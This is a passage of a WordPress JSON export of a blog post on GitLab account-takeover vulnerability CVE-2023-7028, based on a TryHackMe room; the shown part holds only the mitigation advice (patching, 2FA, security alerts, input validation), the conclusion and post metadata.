data-orig-size=\"2136,857\" data-comments-opened=\"1\" data-image-meta=\"{&quot;aperture&quot;:&quot;0&quot;,&quot;credit&quot;:&quot;&quot;,&quot;camera&quot;:&quot;&quot;,&quot;caption&quot;:&quot;&quot;,&quot;created_timestamp&quot;:&quot;0&quot;,&quot;copyright&quot;:&quot;&quot;,&quot;focal_length&quot;:&quot;0&quot;,&quot;iso&quot;:&quot;0&quot;,&quot;shutter_speed&quot;:&quot;0&quot;,&quot;title&quot;:&quot;&quot;,&quot;orientation&quot;:&quot;0&quot;}\" data-image-title=\"image-4\" data-image-description=\"\" data-image-caption=\"\" data-large-file=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-4.png?fit=1024%2C411&amp;ssl=1\" src=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-4.png?resize=1024%2C411&#038;ssl=1\" alt=\"\" class=\"wp-image-419\" srcset=\"https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-4.png?resize=1024%2C411&amp;ssl=1 1024w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-4.png?resize=300%2C120&amp;ssl=1 300w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-4.png?resize=768%2C308&amp;ssl=1 768w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-4.png?resize=1536%2C616&amp;ssl=1 1536w, https:\/\/i0.wp.com\/blog.ishsome.com\/wp-content\/uploads\/2024\/02\/image-4.png?resize=2048%2C822&amp;ssl=1 2048w\" sizes=\"auto, (max-width: 1000px) 100vw, 1000px\" \/><\/figure>\n\n\n\n<div style=\"height:20px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<h3 class=\"wp-block-heading\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Mitigation Techniques<\/mark><\/h3>\n\n\n\n<p>As part of mitigation, GitLab has officially released the patch. 
We can see from the&nbsp;<a href=\"https:\/\/gitlab.com\/gitlab-org\/gitlab-foss\/-\/commit\/21f32835ac7ca8c7ef57a93746dac7697341acc0\" target=\"_blank\" rel=\"noreferrer noopener\">source code review<\/a>&nbsp;that additional validation and verification steps have been added to the GitLab source code repository for the email address to curtail the possibility of exploitation in the future.<\/p>\n\n\n\n<div style=\"height:16px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure class=\"wp-block-image\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/tryhackme-images.s3.amazonaws.com\/user-uploads\/62a7685ca6e7ce005d3f3afe\/room-content\/8ccce20ed06ef96ba2ac69dade1f6315.png?ssl=1\" alt=\"GitLab protection shield with logo\"\/><\/figure>\n\n\n\n<div style=\"height:22px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<p>However, it is of paramount importance to see that non-compliance with secure coding practices leads to disastrous results.<\/p>\n\n\n\n<p>So far, we learned how to perform the attack and how to detect the attack patterns in the logs; let&#8217;s talk about a few mitigation steps that we can take to prevent our servers from being exploited.<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Enable&nbsp;<a href=\"https:\/\/about.gitlab.com\/security\/\" target=\"_blank\" rel=\"noreferrer noopener\">GitLab security alerts<\/a>&nbsp;that would allow early awareness of patches.<\/li>\n<\/ul>\n\n\n\n<div style=\"height:19px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<figure class=\"wp-block-image\"><img data-recalc-dims=\"1\" decoding=\"async\" src=\"https:\/\/i0.wp.com\/tryhackme-images.s3.amazonaws.com\/user-uploads\/62a7685ca6e7ce005d3f3afe\/room-content\/f10bf8f2429499a73ecb54cfa59c12f2.PNG?ssl=1\" alt=\"GitLab update security patch modal\"\/><\/figure>\n\n\n\n<div style=\"height:17px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<ul 
class=\"wp-block-list\">\n<li><strong>Upgrade GitLab<\/strong>&nbsp;to a patched version.<\/li>\n\n\n\n<li>Enable&nbsp;<strong>two-factor authentication (2FA)<\/strong>&nbsp;for all GitLab accounts, especially administrator accounts.<\/li>\n\n\n\n<li>Follow&nbsp;<strong>secure coding practices<\/strong>, including proper input validation and email address verification.<\/li>\n<\/ul>\n\n\n\n<h3 class=\"wp-block-heading\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-luminous-vivid-amber-color\">Conclusion<\/mark><\/h3>\n\n\n\n<p>This is it. As GitLab is a widely used platform and this vulnerability is still being exploited in the wild, it is recommended to keep GitLab updated to prevent such vulnerabilities from being exploited.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>This blog is based on TryHackMe&#8217;s room on GitLab CVE-2023-7028. Learning Objectives What is GitLab? GitLab is a renowned and widely adopted web-based repository manager that provides a comprehensive platform for source code management, continuous integration, and collaboration in software development projects. 
Per the&nbsp;latest stats, the platform ranks first for&nbsp;CI\/CD&nbsp;and DevOps tools, surpassing other vital [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"om_disable_all_campaigns":false,"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"_uf_show_specific_survey":0,"_uf_disable_surveys":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":false,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[1,49,39,13,12],"tags":[],"class_list":["post-414","post","type-post","status-publish","format-standard","hentry","category-blog","category-ctf","category-cve","category-linux","category-tryhackme"],"aioseo_notices":[],"featured_image_src":null,"author_info":{"display_name":"ishsome","author_link":"https:\/\/blog.ishsome.com\/index.php\/author\/e5c77740144cd4a8\/"},"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/posts\/414","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/comments?post=414"}],"version-history":[{"count":1,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/posts\/414\/revisions"}],"predecessor-version":[{"id":420,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/posts\/414\/revisions\/420"}],"wp:attachment":[{"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/media?parent=414"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/categories?post=414"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.ishsome.com\/index.php\/wp-json\/wp\/v2\/tags?post=414"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}